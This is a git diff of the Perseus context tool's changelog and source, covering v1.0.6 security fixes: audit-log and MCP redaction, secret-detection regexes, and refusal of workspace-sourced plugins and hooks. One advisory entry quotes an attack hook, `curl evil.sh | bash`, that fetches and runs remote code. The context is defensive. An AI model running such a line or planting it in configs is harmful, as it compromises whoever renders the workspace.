single source files or context-pack render targets, with +951|952| deterministic debounce tests and clean shutdown behavior. +952|953| +953|954|## [0.9.0] β€” 2026-05-19 +954|955| +955|956|### Trust, privacy, and local policy (Phase 17) +956|957| +957|958|- **task-45** β€” Permission profiles (`strict` / `balanced` / `power-user`); `perseus trust` and `--json`; `serve.bind` promoted to config; version bump to 0.9.0. +958|959|- **task-46** β€” Secrets redaction (`DEFAULT_REDACTION_RULES`, `redact_text()`) at render/synthesize/serve trust boundaries; source files never mutated; counts-only report. +959|960|- **task-47** β€” Audit log (`audit_event()` JSONL with rotation); emitters at 5 trust boundaries; `perseus trust audit [--tail N] [--json]`; default `perseus trust` shows audit posture; secret values never persisted. +960|961| +961|962|### Distribution (Phase 18) +962|963| +963|964|- **task-48** β€” Installer bootstrap (`scripts/install.sh` + `INSTALL.md`); preserves the single-file runtime; verifies Python 3.10+ and `pyyaml`; idempotent upgrade and clean uninstall. +964|965|- **task-49** β€” Release artifacts and versioning: `VERSION` file as source of truth, `scripts/release.sh` produces a deterministic tarball + zip + SHA256SUMS, this changelog, and version-coherence checks (perseus.py / VERSION / CHANGELOG). +965|966| +966|967|### Verification +967|968| +968|969|- Tests: 393 passing, 0 skipped. +969|970|- Single-file runtime: `perseus.py` (`pyyaml` only). +970|971| +971|972|## [0.8.x and earlier] +972|973| +973|974|Pre-Phase 17 history is tracked in `tasks/` (closed task files) and `HANDOFF.md`. +974|975|976| +975|976|# Changelog +977| +978|All notable changes to Perseus. +979| +980|This project follows the alpha-then-semver convention: +981|during the alpha (pre-`1.0.0`) phase, minor bumps may include breaking changes +982|that are documented in the release notes. +983| +984|Each entry maps a release to the task IDs that shipped in it. The +985|single-file `perseus.py` runtime is the only required artifact; everything +986|else (installer, docs) is generated by `scripts/release.sh`. +987| +988|## [1.0.6] β€” UNRELEASED +989| +990|Critical security + correctness hotfix bundle. See GitHub milestone +991|[v1.0.6](https://github.com/tcconnally/perseus/milestone/1). +992| +993|### πŸ”’ Security +994| +995|- **#137** β€” `@query` audit log no longer leaks secrets. Pre-1.0.6, calls +996| like `@query "curl -H 'Authorization: Bearer *** rendered correctly +997| redacted output but persisted the raw bearer token to +998| `~/.perseus/audit_log.jsonl` (via the `command` field), and leaked the +999| same secret in `@query` error/timeout/no-output messages back into +1000| render output. +1001| - `audit_event` (audit.py) now passes every user-supplied field value +1002| through `redact_text` before writing. Structural fields (`directive`, +1003| `exit_code`, `duration_ms`, `pid`, etc.) are exempt via an explicit +1004| allowlist (`_AUDIT_NEVER_REDACT_KEYS`). +1005| - `resolve_query` (directives/query.py) redacts `cmd`, `stderr`, and +1006| exception messages before interpolating them into the error/timeout/ +1007| no-output strings. +1008| - New config knob `audit.redact_fields` (default `true`); set `false` +1009| to opt out for forensic mode where the audit log is itself the +1010| secured artifact. +1011| - Nested structures (dicts, lists) are walked recursively. +1012| +1013|### πŸ› Bug Fixes (other v1.0.6 items, tracked in milestone) +1014|- #128, #129, #130, #131, #135, #136, #138, #139, #140, #141, #142 +1015| +1016|### πŸ“¦ Migration Notes +1017|- No config breaking changes. The new `audit.redact_fields` default of +1018| `true` is strictly more secure than pre-1.0.6 behavior. +1019| +1020|--- +1021| +1022|## [1.0.5] β€” 2026-05-26 +1023| +1024|**Bastra-Recall β€” Persistent Memory Backend (superseded by MnΔ“mΔ“ v2 in 1.0.6):** +1025| +1026|> ⚠ The `@bastra` directive and `memory.backend = "bastra"` config were removed in a +1027|> subsequent release and replaced by the native MnΔ“mΔ“ v2 SQLite FTS5 backend +1028|> (`@mneme` directive). The `@memory` directive now routes exclusively through +1029|> MnΔ“mΔ“ v2. See Β§MnΔ“mΔ“ v2 below. +1030| +1031|- **task-86** β€” `@bastra` directive: query persistent memories via the bastra-recall HTTP API. *(Removed β€” use `@mneme` instead.)* +1032|- **task-87** β€” `_bastra_recall()` HTTP client *(Removed.)* +1033|- **task-88** β€” `@memory` backend routing *(Removed β€” unified under MnΔ“mΔ“ v2.)* +1034|- **task-89** β€” `memory.backend` and `bastra_url` config keys *(Removed.)* +1035|- **task-90** β€” 20 new tests *(Removed with the feature.)* +1036| +1037|## [1.0.4] β€” 2026-05-25 +1038| +1039|**Phase 24 β€” Extensibility Architecture (Hephaestus):** +1040| +1041|- **task-65** β€” Plugin directive system: auto-discovered Python plugins under `~/.perseus/plugins/`. Each module exports a `REGISTER` dict of `DirectiveSpec` entries. Plugin errors are warnings, not fatal. +1042|- **task-66** β€” Directive macros: `@macro name ... @endmacro` blocks in context documents or `.perseus/macros.md`. Pre-processing pass expands invocations before the resolver loop. +1043|- **task-67** β€” Render pipeline hooks: lifecycle callbacks (`on_render_start`, `on_directive_resolved`, `on_cache_hit/miss`, `on_render_complete`, `on_directive_error`) via shell commands or Python callbacks. +1044|- **task-68** β€” Output format adapters: plugin interface for custom formats beyond markdown/HTML. `perseus render --format json` returns structured `{resolved, directives}` output. +1045|- **task-69** β€” Foreign resolver protocol: `@perseus ` fetches rendered context from remote Perseus serve instances. HMAC signature verification, TTL caching, graceful degradation. +1046|- **task-70** β€” Custom schema validators: plugin validators in `.perseus/schemas/`. Referenced via `schema="plugin:my-validator"`. Works alongside the built-in validator. +1047|- **task-71** β€” Pipe syntax: lightweight chaining β€” `@query "ls" | @cache ttl=300`. Left-to-right resolution, output of stage N becomes input of stage N+1. +1048|- **task-72** β€” Event webhooks: POST render lifecycle events to external URLs with optional HMAC-SHA256 signing. Config-driven with per-event selection. +1049|- **task-73** β€” Tool directive integration: `@tool "path/to/tool"` with config-based allowlist, argument restrictions, timeouts, and output size caps. +1050|- **task-74** β€” Directive aliasing: config-driven shorthand β€” `@qβ†’@query`, `@svcβ†’@services`. Single-pass expansion, built-ins always win collisions. +1051| +1052|**Phase 25 β€” MCP Deep Integration:** +1053| +1054|- **task-75** β€” Expose every directive as an MCP tool. `perseus mcp serve` runs a JSON-RPC 2.0 MCP server over stdio. Each `DIRECTIVE_REGISTRY` entry becomes a `perseus_` tool with auto-generated descriptions and input schemas. Trust gates enforced per-tool. Backward compatible with existing `perseus_get_context` / `perseus_get_health`. +1055| +1056|## [1.0.3] β€” 2026-05-24 +1057| +1058|**Phase 24 β€” Assistant format targets, hook installer, MCP server (~840 lines):** +1059| +1060|- **task-77** β€” Assistant format targets: `perseus render --format agents-md|claude-md|cursorrules|copilot-instructions` +1061| renders `.perseus/context.md` into every major assistant's native context file. Auto-resolves +1062| default output paths. Each file gets a "Generated by Perseus" header pointing back to the source. +1063|- **task-78** β€” Hook installer: `perseus install --target claude-code` drops SessionStart + UserPromptSubmit +1064| hooks into `.claude/settings.json` for automatic context injection at session start and on every +1065| prompt. Also supports `--target cursor`, `gemini-cli`, `copilot`. Smart merge preserves existing hooks. +1066|- **task-79** β€” MCP server faΓ§ade: `perseus mcp serve` runs as a JSON-RPC 2.0 MCP server over stdio, exposing +1067| 13 Perseus directives as native MCP tools (query, services, memory, skills, waypoint, session, +1068| agora, inbox, read, env, health, agent, date). `mcp config` prints ready-to-paste client configs. +1069| +1070|**Distribution:** +1071| +1072|- **task-80** β€” MCP Registry listing published live (`server.json`) β€” 13 tools, PyPI transport. +1073|- **task-81** β€” Anthropic Skills marketplace listing (`SKILL.md`) β€” ready for PR to `anthropics/skills`. +1074|- `pyproject.toml` version bumped to 1.0.3. +1075| +1076|**Show HN preparation:** +1077| +1078|- **task-82** β€” Swarm demo script β€” 120 agents, 4 batches, 51 frames of parallel multi-agent coordination. +1079|- **task-83** β€” Swarm demo GIF re-themed to match perseus.observer palette; added to README Multi-Agent section. +1080|- **task-84** β€” Show HN post draft. +1081|- **task-85** β€” Cyberpunk v2 landing page deployed to perseus.observer. +1082| +1083|**CI, docs, and tooling:** +1084| +1085|- GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12. +1086|- `.coveragerc` β€” 70% coverage threshold. +1087|- 596 tests passing, 1 skipped. +1088| +1089|## [1.0.2] β€” 2026-05-23 +1090| +1091|**Bug fixes (Opus 4.7 Max / Codex 5.5 Extreme High benchmarks):** +1092| +1093|- **task-63** β€” Fixed `Path.write_text` missing encoding on Windows β€” emoji (πŸ“Œ) crash in default prompts. +1094|- **task-64** β€” Fixed `/bin/bash` unreachable on native Windows Python β€” added `_get_shell()` helper +1095| using `shutil.which()` with system-default fallback for `@query`, `@services`, and `@agent`. +1096|- **task-65** β€” Fixed `@query` binary stdout NoneType crash β€” guarded `result.stdout` with `or ""`. +1097|- **task-66** β€” Fixed `perseus --help` crash on Windows (MnΔ“mΔ“ macron `Δ“` can't encode to `cp1252`) β€” +1098| added `sys.stdout/stderr.reconfigure(encoding="utf-8")` at import time. +1099| +1100|**New features:** +1101| +1102|- **task-67** β€” **`render.max_query_bytes`** (default 256 KB) β€” caps runaway `@query` stdout with a +1103| visible truncation marker. Prevents 12 MB scanner output from silently inflating +1104| context documents (47Γ— output reduction demonstrated). +1105|- **task-68** β€” **Configurable `@query` timeout** β€” `render.query_timeout_s` (default 30s) and per-directive +1106| `timeout=N` modifier (e.g. `@query "..." timeout=120`). +1107|- **task-69** β€” **`render.parallel_services`** (opt-in, default off) β€” concurrent `@services` health checks +1108| via `ThreadPoolExecutor`. 100 services go from ~5 min serial to ~3 s parallel. +1109|- **task-70** β€” **`render.parallel_queries`** (opt-in, default off) β€” pre-scans top-level `@query` directives +1110| and resolves them concurrently. Directives inside `@if` branches remain sequential. +1111| +1112|**Integrations:** +1113| +1114|- **task-71** β€” **VS Code / Cursor extension** β€” auto-renders on `.perseus/context.md` save, status bar +1115| indicator, auto-detects target assistant file, watch mode. +1116|- **task-72** β€” **Claude Code session hook** β€” one `curl` install, runs `perseus render` before every +1117| Claude Code session. +1118|- **task-73** β€” **GitHub Action** β€” renders context on push/schedule, commits back to repo so every +1119| developer gets pre-resolved context without installing Perseus locally. +1120| +1121|**Multi-agent coordination:** +1122| +1123|- **task-74** β€” **Shared checkpoint store** β€” agents across machines/sessions share a single checkpoint +1124| store (config: `checkpoints.store` path, accessible via NFS/SMB/unison). +1125|- **task-75** β€” **Lock file mechanism** β€” `os.O_CREAT | os.O_EXCL` atomic lock in the checkpoint +1126| store prevents concurrent writers from clobbering. Retries with backoff for ~11s before failing +1127| gracefully. NFS-safe (O_CREAT | O_EXCL is atomic cross-filesystem). +1128|- **task-76** β€” **Checkpoint recovery** β€” `perseus recover --from ` reads the latest checkpoint +1129| and prints the workspace/task/status triplet so an agent dropped into a terminal knows exactly +1130| where to resume. +1131| +1132|**Benchmarks:** +1133| +1134|- Extreme scaling sweep on Linux: 10 β†’ 10,000 `@query` directives, 4 modes each +1135| (sequential, cached, parallel, cached+parallel). Cache warm time stays flat at +1136| ~0.3–0.5s regardless of scale. 10,000 queries at 0.52s warm (25Γ— vs 13.1s cold). +1137|- Integrated heavy benchmark suite (`benchmark/heavy/`) with 4 reports, setup harnesses, +1138| machine-readable result JSONs from Claude Code Opus 4.7 and Codex 5.5 Extreme High runs. +1139|- Efficiency infographic on README showing coldβ†’warm scaling curve and 40Γ— warm speedup. +1140| +1141|**CI, docs, and tooling:** +1142| +1143|- Added GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12. +1144|- Added `.coveragerc` β€” 70% coverage threshold. +1145|- Updated `.gitignore` for generated context files (CLAUDE.md, AGENTS.md, .cursorrules). +1146|- Updated demo GIF with 6-scene coldβ†’warm walkthrough. +1147|- 540 tests passing, 1 skipped. 70% coverage on the 10,463-line artifact. +1148| +1149|## [1.0.1] β€” 2026-05-21 +1150| +1151|Patch release: corrects the PyPI author field to the GitHub handle (`tcconnally`). +1152|No code changes; all 496 tests pass. +1153| +1154|- **task-62** (follow-up) β€” post-release doc and metadata fixes: corrected PyPI author +1155| field, updated test-count references across README/docs/index.md to reflect live count +1156| (496 passed, 1 skipped), and aligned PRODUCT_CONTRACT.md status to v1.0.1 stable. +1157| +1158|## [1.0.0] β€” 2026-05-20 +1159| +1160|All Phase 1–22 tasks complete. Perseus v1.0.0 β€” the first stable release. +1161| +1162|- **task-56** β€” Phase 20C: added headless watch mode (`perseus watch`) β€” inotify/polling +1163| file watcher with configurable interval, re-render on change, and debounce. Degrades +1164| gracefully when watchdog is unavailable. +1165|- **task-57** β€” Phase 21A: added golden evaluation corpus under `tests/fixtures/golden/` +1166| covering render, synthesis, and Pythia output shapes; deterministic comparison harness +1167| in `tests/test_golden.py`. +1168|- **task-58** β€” Phase 21B: added performance budget framework (`tests/test_perf_budgets.py`) +1169| with per-command cold/warm timing, advisory warnings at 2Γ— budget, and configurable +1170| thresholds. Three commands (render, graph, prefetch) emit advisory warnings in the +1171| current environment β€” not failures. +1172|- **task-59** β€” Phase 21C: added compatibility and migration suite (`tests/test_compat_migration.py`) +1173| covering checkpoint round-trip compatibility, config migration (`oracle:` β†’ `pythia:` rename), +1174| pack manifest version handling, and install/upgrade smoke paths. +1175|- **task-60** β€” Phase 22A: added `docs/index.md` (documentation hub), `docs/quickstart.md` +1176| (install-to-render in 10 steps), and `docs/CONTRIBUTING.md` (contributor guide with +1177| single-file constraint, directive authoring 4-touch pattern, test conventions, Agora +1178| workflow). Updated README with `## Documentation` section. +1179|- **task-61** β€” Phase 22B: added `examples/` with three runnable demo workspaces: +1180| `local-cli/` (render, checkpoint, recover, suggest, doctor), `assistant-profile/` +1181| (context pack, hermes profile, @memory + @agora), and `container/README.md` (Docker +1182| mount and auth guide). Smoke scripts verified end-to-end. +1183|- **task-62** β€” Phase 22C: v1 release candidate checklist. 493 tests passing (1 skipped +1184| TCP smoke). Release artifacts built and checksums verified. README/CHANGELOG/ROADMAP +1185| docs aligned. Version bumped to `1.0.0-rc.1`. Known limitations documented. +1186| +1187|## [1.0.0-rc.1] β€” 2026-05-20 +1188| +1189|Release candidate β€” superseded by v1.0.0. +1190| +1191|- **task-63** β€” Completed the Oracle β†’ Pythia internal rename while preserving the +1192| public `perseus oracle` CLI compatibility surface. Added legacy `oracle:` +1193| config warnings and one-time `oracle_log.jsonl` β†’ `pythia_log.jsonl` +1194| migration. +1195|- **task-49** β€” Phase 18B: added `tests/test_release.py` (16 tests) covering all +1196| release artifact acceptance criteria β€” version coherence, repeatability, +1197| SHA256SUMS integrity, CHANGELOG task mapping, and tarball contents. +1198|- **task-50** β€” Phase 18C: aligned scheduler behavior and docs around +1199| host-neutral POSIX crontab generation, macOS launchd, Linux systemd, and +1200| explicitly deferred native Windows Task Scheduler support. Added scheduler +1201| smoke tests and repaired release artifact portability on macOS/BSD tar. +1202|- **task-51** β€” Phase 19A: added offline adapter conformance fixtures and a +1203| parametrized harness covering generic, Hermes, Codex, Claude Code, Cursor, +1204| and Rovo Dev render outputs, pack manifests, and integration docs. +1205|- **task-52** β€” Phase 19B: promoted product profiles into a documented gallery +1206| with output paths, trust defaults, refresh guidance, non-interactive generation +1207| tests, and hardcoded-path guards for all six supported profiles. +1208|- **task-53** β€” Phase 19C: polished the VSCode extension for release with +1209| reproducible packaging docs, package scripts, LSP render/checkpoint/mutation +1210| smoke tests, and static package-manifest checks. +1211|- **task-54** β€” Phase 20A: added optional bearer-token authentication for +1212| `perseus serve`, a token generator, non-loopback bind safety gates, trust +1213| report serve fields, and HTTP auth tests. +1214|- **task-55** β€” Phase 20B: added a single-file-runtime container image, +1215| compose examples for render and authenticated serve, container trust docs, +1216| and static/optional Docker smoke tests. +1217|- **task-56** β€” Phase 20C: added `perseus watch`, a dependency-free polling +1218| loop for refreshing single source files or context-pack render targets, with +1219| deterministic debounce tests and clean shutdown behavior. +1220| +1221|## [0.9.0] β€” 2026-05-19 +1222| +1223|### Trust, privacy, and local policy (Phase 17) +1224| +1225|- **task-45** β€” Permission profiles (`strict` / `balanced` / `power-user`); `perseus trust` and `--json`; `serve.bind` promoted to config; version bump to 0.9.0. +1226|- **task-46** β€” Secrets redaction (`DEFAULT_REDACTION_RULES`, `redact_text()`) at render/synthesize/serve trust boundaries; source files never mutated; counts-only report. +1227|- **task-47** β€” Audit log (`audit_event()` JSONL with rotation); emitters at 5 trust boundaries; `perseus trust audit [--tail N] [--json]`; default `perseus trust` shows audit posture; secret values never persisted. +1228| +1229|### Distribution (Phase 18) +1230| +1231|- **task-48** β€” Installer bootstrap (`scripts/install.sh` + `INSTALL.md`); preserves the single-file runtime; verifies Python 3.10+ and `pyyaml`; idempotent upgrade and clean uninstall. +1232|- **task-49** β€” Release artifacts and versioning: `VERSION` file as source of truth, `scripts/release.sh` produces a deterministic tarball + zip + SHA256SUMS, this changelog, and version-coherence checks (perseus.py / VERSION / CHANGELOG). +1233| +1234|### Verification +1235| +1236|- Tests: 393 passing, 0 skipped. +1237|- Single-file runtime: `perseus.py` (`pyyaml` only). +1238| +1239|## [0.8.x and earlier] +1240| +1241|Pre-Phase 17 history is tracked in `tasks/` (closed task files) and `HANDOFF.md`. +1242|1243| # Changelog All notable changes to Perseus. @@ -14,6 +1254,15 @@ else (installer, docs) is generated by `scripts/release.sh`. ### πŸ”’ Security +- **#165** β€” `parallel_queries` pre-scan is now control-flow aware. + Pre-1.0.6 it walked every line ignoring `@if/@else/@endif`, so a + `@query` inside a false conditional branch still pre-executed in + parallel. This silently undermined the documented `@if/@else` + security model β€” sensitive queries guarded by env/dry-run/debug + gates ran regardless. The pre-scan now tracks an `@if/@else/@endif` + stack, evaluates each condition exactly once via the same + `evaluate_condition` the main loop uses, and only enqueues queries + in active branches. - **#169** β€” Workspace-sourced plugin configuration (`plugins.dir`) is now refused by default. Pre-1.0.6 a workspace `.perseus/config.yaml` setting `plugins.dir: /path/to/attacker/code` caused @@ -23,59 +1272,42 @@ else (installer, docs) is generated by `scripts/release.sh`. vector as #168 but with no shell-quoting limits. Attack: git clone a malicious workspace, get pwned. - Fix: `_discover_plugins` consults - `cfg["_provenance"]["plugins_workspace_sourced"]` set by - `load_config`. Workspace-sourced plugin config is refused unless BOTH: - 1. Global `~/.perseus/config.yaml` sets `plugins.allow_workspace_sourced: true` - 2. Env var `PERSEUS_ALLOW_DANGEROUS=1` + Regression suite (8 tests): false-branch skip, true-branch run, + else-branch run, if-branch skipped-when-else-taken, nested inactive + outer, nested true/true, parity with `parallel_queries=False`, and + malformed-condition skips both branches. - Refusal emits a `plugins_workspace_refused` audit event with the - refused directory path. Global-sourced plugin config is unaffected. +--- +- **#166** β€” All MCP tool responses now pass through `redact_text()` + before being returned to the connected client. Pre-1.0.6, + `perseus_get_context` called `render_source` (no redaction) instead + of `render_output`, and every other tool resolver returned raw + resolver output. Secrets configured in `redaction.patterns` leaked + to Claude Desktop / Rovo Dev / any MCP client. The fix adds + `_mcp_redact()` helper applied to every successful AND error return + path in `_call_tool`. Honors `redaction.enabled` opt-out. - Regression suite (8 tests): workspace plugin dir refused by default, - allowed with full opt-in, refused with only-global, refused with - only-env, global plugins always load, audit trail, no false-positive - refusal when no plugin config exists, allow-gate helper unit test. - -- **#168** β€” Workspace-sourced shell hooks and Python `hooks.dir` are - now refused by default. Pre-1.0.6 a workspace `.perseus/config.yaml` - could declare `hooks.on_render_start: ["curl evil.sh | bash"]` and - the command would run on the next `perseus render` β€” no - `allow_query_shell`, no `PERSEUS_ALLOW_DANGEROUS`, no audit. Same - attack via `hooks.dir: /path/to/attacker/code` (Python top-level - code runs at import time). Attack: git clone a malicious workspace, - get pwned. - - Fix: `load_config` annotates `cfg["_provenance"]` with which - sections came from the workspace source. `hooks.py` refuses - workspace-sourced shell hooks and `hooks.dir` Python hooks unless - BOTH conditions are met: - 1. Global `~/.perseus/config.yaml` sets `hooks.allow_workspace_sourced: true` - 2. Env var `PERSEUS_ALLOW_DANGEROUS=1` is set - - Refusal emits `hooks_workspace_refused` / `hooks_workspace_shell_refused` - audit events plus a stderr warning. Global-sourced hooks are - unaffected (the user owns global config; trust is implicit). - - Regression suite (10 tests): workspace shell hook refused, allowed - with full opt-in, refused with only-global opt-in, refused with - only-env opt-in, global hooks always run, provenance tracking, audit - trail, Python hooks.dir refused. + Regression suite (10 tests): perseus_get_context (markdown+json), + perseus_query stdout, perseus_read body, perseus_get_health, error + paths, redaction.enabled=False parity, plus unit tests for + defensive behavior of the helper. +--- ## [1.0.5] β€” 2026-05-26 -**MnΔ“mΔ“ v1 β€” Persistent Memory Backend (upgraded to MnΔ“mΔ“ v2 in 1.0.6):** +**Bastra-Recall β€” Persistent Memory Backend (superseded by MnΔ“mΔ“ v2 in 1.0.6):** -> ⚠ The initial `@mneme` directive and memory backend were upgraded in a -> subsequent release to the native MnΔ“mΔ“ v2 SQLite FTS5 backend. The `@memory` -> directive now routes exclusively through MnΔ“mΔ“ v2. See Β§MnΔ“mΔ“ v2 below. +> ⚠ The `@bastra` directive and `memory.backend = "bastra"` config were removed in a +> subsequent release and replaced by the native MnΔ“mΔ“ v2 SQLite FTS5 backend +> (`@mneme` directive). The `@memory` directive now routes exclusively through +> MnΔ“mΔ“ v2. See Β§MnΔ“mΔ“ v2 below. -- **task-86** β€” `@mneme` directive: query persistent memories via the MnΔ“mΔ“ memory backend. -- **task-87** β€” `_mneme_recall()` memory client. -- **task-88** β€” `@memory` backend routing *(Upgraded β€” unified under MnΔ“mΔ“ v2.)* -- **task-89** β€” `memory.backend` config key *(Upgraded in MnΔ“mΔ“ v2.)* -- **task-90** β€” 20 new tests *(Upgraded with the feature.)* +- **task-86** β€” `@bastra` directive: query persistent memories via the bastra-recall HTTP API. *(Removed β€” use `@mneme` instead.)* +- **task-87** β€” `_bastra_recall()` HTTP client *(Removed.)* +- **task-88** β€” `@memory` backend routing *(Removed β€” unified under MnΔ“mΔ“ v2.)* +- **task-89** β€” `memory.backend` and `bastra_url` config keys *(Removed.)* +- **task-90** β€” 20 new tests *(Removed with the feature.)* ## [1.0.4] β€” 2026-05-25 diff --git a/perseus.py b/perseus.py index b68eed4..5fb826d 100644 --- a/perseus.py +++ b/perseus.py @@ -163,6 +163,12 @@ "recent_keep": 5, # raw checkpoints to include in Recent Activity "auto_update": True, # update narrative on every checkpoint write "compact_threshold": 20, # advisory: compact after this many incremental updates + # #131: wall-clock deadline for `perseus memory compact` LLM path. + # 0 = no deadline (pre-1.0.6 behavior β€” can hang indefinitely on + # slow models). Default 180s (3 min) covers Ollama mistral on a + # modern laptop for typical workspace sizes. On timeout the LLM + # call is abandoned and the deterministic narrative is used. + "compact_total_timeout_s": 180, "llm_provider": None, # None = deterministic; "ollama" / "openai-compat" enables LLM "llm_model": None, # inherits from llm: block if None "max_narrative_lines": 300, # warn (not error) if narrative grows beyond this @@ -350,13 +356,29 @@ } -def _apply_permission_profile(cfg: dict, profile_name: object) -> str | None: +def _apply_permission_profile( + cfg: dict, + profile_name: object, + skip_keys: set[tuple[str, str]] | None = None, +) -> str | None: """Apply a permission profile to cfg in place. Returns the canonical profile name applied, or None if profile_name is falsy or unknown. Unknown profile names are silently ignored so a config typo cannot brick the renderer β€” but `perseus trust` surfaces the canonical applied profile so the operator can spot the mismatch. + + #129 hardening (v1.0.6): callers may pass `skip_keys` β€” a set of + `(section, key)` tuples that the user has explicitly set in their + config. Those keys are skipped, structurally guaranteeing that + explicit user values win over the profile regardless of which order + the caller invokes profile-apply vs user-merge. + + Pre-v1.0.6 callers (skip_keys=None) get the legacy destructive merge, + which still works correctly when followed by a user-merge step β€” but + is fragile to ordering changes. New callers should always pass + skip_keys (even if empty) so the audit-log layering decision is + accurate. """ if not profile_name: return None @@ -364,10 +386,15 @@ def _apply_permission_profile(cfg: dict, profile_name: object) -> str | None: profile = PERMISSION_PROFILES.get(name) if not profile: return None + skip = skip_keys or set() for section, vals in profile.items(): if section not in cfg or not isinstance(cfg[section], dict): cfg[section] = {} - cfg[section].update(vals) + for key, val in vals.items(): + if (section, key) in skip: + # User has explicitly configured this key; respect them. + continue + cfg[section][key] = val return name @@ -1512,8 +1539,19 @@ def _reset_plugin_cache() -> None: {"name": "jwt", "pattern": r"\beyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\b"}, # PEM private key block (covers RSA, EC, OPENSSH, generic) {"name": "private_key_block", "pattern": r"-----BEGIN (?:RSA |EC |OPENSSH |DSA |ENCRYPTED |PGP )?PRIVATE KEY-----[\s\S]*?-----END (?:RSA |EC |OPENSSH |DSA |ENCRYPTED |PGP )?PRIVATE KEY-----"}, - # Hex-encoded high-entropy strings of 40+ chars used as secrets/api hashes - {"name": "long_hex_secret", "pattern": r"\b[a-fA-F0-9]{40,}\b"}, + # Hex-encoded high-entropy strings of 40+ chars in an obvious credential + # context (assigned to a `secret=`, `token=`, `key=`, `password=`, + # `api_key=` slot, or quoted after a colon in JSON/YAML). + # + # IMPORTANT: a bare `\b[a-fA-F0-9]{40,}\b` rule (pre-1.0.6 default) was a + # landmine β€” it matched git commit SHAs (40 hex chars), SHA-256 sums (64 + # hex chars), Docker digests, and Atlassian content hashes, silently + # destroying forensically important data in `@query "git log"` output + # and similar. This rule now requires an explicit credential anchor. + # See: https://github.com/tcconnally/perseus/issues/136 + {"name": "long_hex_secret", + "pattern": r"(?i)(?:secret|token|key|password|passwd|api[_-]?key|auth(?:orization)?)\s*[:=]\s*[\"']?([a-fA-F0-9]{40,})[\"']?", + "_anchor_group": 1}, # HuggingFace: hf_... (read/write tokens) {"name": "huggingface_token", "pattern": r"\bhf_[A-Za-z0-9]{30,}\b"}, # Google Cloud API key: AIza... @@ -1577,7 +1615,19 @@ def _compile_redaction_rules(cfg: dict) -> list[dict]: replacement = rule.get("replacement") if not replacement: replacement = f"[REDACTED:{name}]" - compiled.append({"name": name, "regex": regex, "replacement": str(replacement)}) + # `_anchor_group` (rule-internal, default None): index of the capture + # group holding the SECRET payload (everything outside that group is + # context that must be preserved verbatim). Used by the credential- + # anchored `long_hex_secret` rule. When unset, fall back to legacy + # behavior: group(1) (if present) is treated as a leading prefix to + # preserve and the rest of the match is replaced. + anchor_group = rule.get("_anchor_group") + compiled.append({ + "name": name, + "regex": regex, + "replacement": str(replacement), + "anchor_group": anchor_group, + }) return compiled @@ -1611,12 +1661,29 @@ def redact_text(text: str, cfg: dict) -> tuple[str, dict]: name = rule["name"] regex = rule["regex"] # subn returns (new, n); use a callable replacement so groupref-style - # rules (e.g. the bearer header rule that preserves the prefix via - # group 1) work consistently. - def _sub(match, _repl=rule["replacement"]): + # rules work consistently. + # + # Three modes: + # 1. `anchor_group=N`: the captured group at index N is the SECRET + # payload. Replace only that span; preserve everything else + # verbatim. Used by the credential-anchored `long_hex_secret` rule. + # 2. `match.lastindex` set (no anchor_group): legacy behavior β€” the + # first capture group is a prefix to preserve, everything after + # the prefix is replaced. Used by `bearer_header`. + # 3. No capture groups: replace the whole match. + def _sub(match, _repl=rule["replacement"], _ag=rule.get("anchor_group")): + if _ag is not None: + try: + span_start, span_end = match.span(_ag) + except (IndexError, re.error): + return _repl + if span_start < 0: + return _repl + full = match.group(0) + rel_start = span_start - match.start() + rel_end = span_end - match.start() + return full[:rel_start] + _repl + full[rel_end:] if match.lastindex: - # Preserve any leading captured group verbatim (e.g. the - # `Authorization: Bearer ` prefix); everything else is wiped. return match.group(1) + _repl return _repl out, n = regex.subn(_sub, out) @@ -1752,12 +1819,63 @@ def _audit_rotate_if_needed(path: Path, max_bytes: int) -> None: return +# Audit field names that NEVER get redacted (they are structural metadata, +# never user-supplied secrets). Adding to this allowlist is a security +# decision β€” review carefully. +_AUDIT_NEVER_REDACT_KEYS = frozenset({ + "ts", "event_type", "perseus_version", "pid", + "directive", "exit_code", "duration_ms", "bytes_in", "bytes_out", + "schema_ref", "schema_ok", "policy", "decision", "trust_profile", + "permission", "session_id", "workspace_hash", +}) + + +def _audit_redact_value(value, cfg): + """Apply render-time redaction rules to an audit field value. + + Regression for #137: pre-1.0.6, `audit_event` wrote field values verbatim + to ``audit_log.jsonl``. When a user wrote + ``@query "curl -H 'Authorization: Bearer ghp_…'"``, the rendered output + was correctly redacted, but the audit log retained the raw bearer token + forever. We now pipe every string-shaped audit field through + ``redact_text`` before writing. + + Lists, dicts, and nested structures are walked recursively. Non-string + leaves (ints, bools, None) pass through. If ``redact_text`` is unavailable + or raises (older builds, malformed rules), we fall back to the raw value + rather than dropping the audit entry β€” observability beats perfect + redaction here, and rendered output is the primary defense. + """ + if value is None or isinstance(value, (bool, int, float)): + return value + if isinstance(value, str): + try: + redacted, _ = redact_text(value, cfg) + return redacted + except Exception: + return value + if isinstance(value, dict): + return {k: _audit_redact_value(v, cfg) for k, v in value.items()} + if isinstance(value, (list, tuple)): + return [_audit_redact_value(v, cfg) for v in value] + # Bytes, sets, custom objects β€” stringify then redact. + try: + as_str = str(value) + redacted, _ = redact_text(as_str, cfg) + return redacted + except Exception: + return repr(value) + + def audit_event(cfg: dict, event_type: str, **fields) -> None: """Append a structured audit event to the configured JSONL log. AC #1: sensitive operations emit structured events. AC #4: logging failures warn but do not break normal render. AC #5: callers can disable via `audit.enabled = false`. + AC #6 (1.0.6, #137): user-supplied field values are passed through the + same redaction rules used for render output. Structural metadata + keys (in ``_AUDIT_NEVER_REDACT_KEYS``) are exempt. Caller passes any JSON-serializable fields. We always stamp: ts β€” UTC ISO-8601 @@ -1774,7 +1892,12 @@ def audit_event(cfg: dict, event_type: str, **fields) -> None: "perseus_version": _PERSEUS_VERSION, "pid": os.getpid(), } + # Allow operators to opt out of audit redaction (e.g. for forensic mode + # where the audit log is itself the secured artifact). Default ON. + redact_audit = bool(audit_cfg.get("redact_fields", True)) for k, v in fields.items(): + if redact_audit and k not in _AUDIT_NEVER_REDACT_KEYS: + v = _audit_redact_value(v, cfg) # Defensive: stringify any non-JSON-safe value rather than crashing. try: json.dumps(v) @@ -1783,10 +1906,13 @@ def audit_event(cfg: dict, event_type: str, **fields) -> None: record[k] = repr(v) # v1.0.5 review: redact secrets before persisting to disk. # Audit events can contain command strings, paths, or args with 